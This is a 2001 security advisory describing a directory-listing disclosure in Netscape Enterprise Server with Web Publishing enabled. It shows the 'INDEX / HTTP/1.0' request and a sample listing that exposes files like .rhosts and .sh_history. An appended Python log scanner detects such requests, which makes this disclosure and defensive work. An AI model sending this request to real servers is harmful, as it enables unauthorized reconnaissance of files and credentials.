From: Security Research Team (securityRELAYGROUP.COM)
Date: Wed Jan 24 2001 - 09:41:24 CST

    __________________________________________________________

          S.A.F.E.R. Security Bulletin 010124.EXP.1.11
    __________________________________________________________

    TITLE : Netscape Enterprise Server - INDEX request problem
    DATE : January 24, 2001
    NATURE : Information gathering
    AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

    PROBLEM:

    A problem exists that allows a remote user to obtain directory listings on a remote site running Web Publishing.

    DETAILS:

    It is possible to obtain a directory listing on the remote web server by issuing the command:

    INDEX / HTTP/1.0

    Output looks like:

    -- output start --

    Trying 192.168.1.1...
    Connected to www.example.org.
    Escape character is '^]'.
    INDEX / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Netscape-Enterprise/3.6 SP2
    Date: Fri, 19 Jan 2001 12:37:26 GMT
    Content-type: text/plain

    test directory 512 979859452 0 null null
    contact directory 512 979701766 0 null null
    index.html text/html 1467 979701461 268 null null
    mobile directory 512 979701775 0 null null
    service directory 512 979701801 0 null null
    .rhosts unknown 22 965727716 264 null null
    search directory 512 931316908 0 null null
    .sh_history unknown 1256 979723453 264 null null
    corporate directory 512 972989267 0 null null
    .cshrc unknown 418 975657629 264 null null
    .login unknown 674 975657629 264 null null
    .profile unknown 416 975657629 264 null null

    -- output end --

    The INDEX request will not work on 'aliased' directories (like CGI directories and similar).

    FIXES:

    Netscape has been contacted on multiple occasions, the first time more than a year ago. Although other problems we have reported have been fixed, we
    have received no response for this issue to date.

    The workaround is to disable Web Publishing, or to disable the INDEX request (which will, most likely, break the web publishing feature).

    CREDITS:

    Emmanuel Gadaix <emmanuelrelaygroup.com>
    Vanja Hrustic <vanjarelaygroup.com>
    Fyodor Yarochkin <fyodorrelaygroup.com>

    This advisory is also available at http://www.safermag.com/advisories/

    __________________________________________________________

       S.A.F.E.R. - Security Alert For Enterprise Resources
              Copyright (c) 2001 The Relay Group
      http://www.safermag.com ---- securityrelaygroup.com
    __________________________________________________________
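
For administrators who cannot disable Web Publishing right away, the INDEX requests described in the advisory can be looked for in the server's access log. The following is an added example, not part of the original bulletin: it assumes the access log is written in Common Log Format, and the log lines, client addresses and status codes are constructed sample data.

```python
import re
from collections import defaultdict

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Za-z]+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jan/2001:12:37:20 +0000] "GET /index.html HTTP/1.0" 200 1467
192.0.2.77 - - [19/Jan/2001:12:37:26 +0000] "INDEX / HTTP/1.0" 200 612
192.0.2.77 - - [19/Jan/2001:12:37:31 +0000] "INDEX /corporate HTTP/1.0" 200 198
192.0.2.77 - - [19/Jan/2001:12:37:40 +0000] "INDEX /cgi-bin HTTP/1.0" 404 207
198.51.100.5 - - [19/Jan/2001:12:40:02 +0000] "index / HTTP/1.0" 200 612
192.0.2.10 - - [19/Jan/2001:12:41:00 +0000] "GET /INDEX HTTP/1.0" 404 207
this line is malformed and must be skipped
"""

def find_index_requests(log_text):
    """Return {client: [(time, path, status, disclosed), ...]} for INDEX requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = CLF.match(line.strip())
        if not m:
            continue  # unparseable line: ignore rather than guess
        # Case-insensitive match is a conservative assumption, so that
        # lowercase variants of the method are reported as well.
        if m["method"].upper() != "INDEX":
            continue
        status = int(m["status"])
        disclosed = 200 <= status < 300  # a 2xx reply means a listing was returned
        hits[m["host"]].append((m["time"], m["path"], status, disclosed))
    return dict(hits)

def summarize(hits):
    """Return sorted (client, total_requests, listings_disclosed) tuples."""
    return sorted((host, len(rows), sum(r[3] for r in rows)) for host, rows in hits.items())

if __name__ == "__main__":
    for host, total, disclosed in summarize(find_index_requests(SAMPLE_LOG)):
        print(f"{host}: {total} INDEX request(s), {disclosed} returned a listing")
```

A path that merely contains the word INDEX (such as `GET /INDEX`) is not reported, because the match is on the request method only.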